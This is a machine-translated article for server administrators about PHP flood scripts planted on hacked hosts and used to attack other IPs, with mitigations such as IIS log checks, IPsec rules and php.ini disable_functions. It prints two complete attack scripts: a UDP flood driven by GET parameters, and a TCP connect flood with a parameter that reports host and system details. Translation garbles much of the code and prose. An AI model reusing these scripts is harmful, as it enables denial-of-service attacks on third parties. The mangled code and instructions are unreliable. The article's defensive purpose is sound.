An analysis of the external contract of PHP
Call Sockets with PHP code, use the server's network to attack other IP directly, common code is as follows:
Copy Code code as follows:
$packets = 0;
$ip = $_get[\ ' ip\ '];
$rand = $_get[\ ' port\ '];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[\ ' time\ '];
$time = time ();
Print \ Flooded: $ip on port $rand
\";
$max _time = $time + $exec _time;
For ($i =0 $i <65535; $i + +) {
$out. = \ "X\";
}
while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Fsockopen (\ "udp://$ip \", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo \ "Packet complete at \". Time (\ ' h:i:s\ '). \ "With
$packets (\ ". Round ($packets *65)/1024, 2)." MB packets averaging \ ".
Round ($packets/$exec _time, 2). \ "PACKETS/S \\n\";
?>
Ii. Characteristics of performance
As soon as you turn on IIS, the server runs out of bandwidth-----that is, the server continues to contract to others, this situation and by DDoS attack is different, DDoS is the server constantly receive a large number of packets.
Recent vulnerabilities due to DEDECMS have caused a large number of servers to appear this problem.
How to find these stations quickly?
You can open the log
C:\Windows\System32\LogFiles\HTTPERR\httperr...log, open the file for today's time,
There's a record like this:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13-http/1.1 445&TIME=120 503 783 Disabled 30_freehost_1
Last three items 783 Disabled 30_freehost_1
783 is the ID of this station in IIS
30_freehost_1 is the same pool.
Iii. Solutions
1. Click to find this site and then stop it. Or stop the pool, and restart IIS.
2. In IP policy, or firewall, prohibit all UDP to send out
In the latest version of the security package, with the 4.0 version of the IP policy "Download safe package", you import directly can limit the outgoing UDP packets. Download the package, and then import the security policy. But this policy does not shut down the DNS port, and some of the attacks are still valid.
In order to solve this problem, you can also adjust the IP policy, restrict UDP can only access specific DNS server IP, such as 8.8.8.8, unless the hacker attack this IP, otherwise the attack is invalid, you can in the network card DNS set up a DNS IP you only know, and do not open, You can then call the UDP open section of the IP policy to resolve it. (Open the properties of the IP policy, double-click open to delete any of the two UDP records in the Open, in the reserved one, double-click, change to address from any address from the source address to the destination address "Specific IP this IP is set for your own DNS IP, such as 8.8.8.8" saved on the line.
In 2011-4-27, we uploaded a new security package that contained an "extraterrestrial virtual host management platform IP policy to shut down all UDP ports with the. IPSec" file, which you can import and enable to shut down all UDP ports to completely prevent such attacks, but This policy because of the shutdown of the DNS port, will cause the server can not use IE access to any domain name, so the user's collection function can not be used. (Similarly, if this strategy is used on the master site, the controlled self-test will not pass because the domain name cannot be resolved, and some users reflect that this policy will cause MySQL not to be normal)
3. With first-class information monitoring, in SQL interception and Web site interception, intercept port= this keyword (other keywords can be deleted.)
4. Can also directly prohibit the above code, such as Win\php.ini after the restart of IIS
Ignore_user_abort = On
(Note that the preceding; must be deleted)
Disable_functions =EXEC,SYSTEM,PASSTHRU,POPEN,PCLOSE,SHELL_EXEC,PROC_OPEN,CURL_EXEC,MULTI_EXEC,DL,CHMOD,STREAM_ Socket_server,popepassthru,pfsockopen,gzinflate,
Add in the back
Fsockopen,set_time_limit
But this can cause a lot of PHP programs are not normal.
In addition, this also shows that your server is doing a good job, if you can invade. The hacker is directly right, what DOS do?
Recently, there are new Phpddos code based on TCP attacks as follows:
Copy Code code as follows:
Set_time_limit (999999);
$host = $_get[' host '];
$port = $_get[' Port '];
$exec _time = $_get[' time '];
$packets = 64;
Ignore_user_abort (True);
if (StrLen ($host) ==0 or StrLen ($port) ==0 or StrLen ($exec _time) ==0) {
if (StrLen $_get[' rat ') <>0) {
echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|".
Php_uname (). "|". $_server[' server_software '].$_get[' rat '];
Exit
}
Exit
}
$max _time = time () + $exec _time;
while (1) {
$packets + +;
if (Time () > $max _time or $exec _time!= 69) {
Break
}
$fp = Fsockopen ("tcp://$host", $port, $errno, $errstr, 0);
}
?>
In the same way, the following solutions can be adopted:
1. Can also directly prohibit the above code, such as Win\php.ini after the restart of IIS
Ignore_user_abort = On
(Note that the preceding; must be deleted)
Disable_functions =EXEC,SYSTEM,PASSTHRU,POPEN,PCLOSE,SHELL_EXEC,PROC_OPEN,CURL_EXEC,MULTI_EXEC,DL,CHMOD,STREAM_ Socket_server,popepassthru,pfsockopen,gzinflate,
Add in the back
Fsockopen,set_time_limit
But this can cause a lot of PHP programs are not normal.
2. Prohibit all outbound TCP packets in IP policy, but this will result in invalid collection functions and can not be used on the master server.
3. In the server to use the keyword TCP: or udp: Search all PHP class files, find the attack file, delete it.
The above methods for VPS, server hosting user learning!
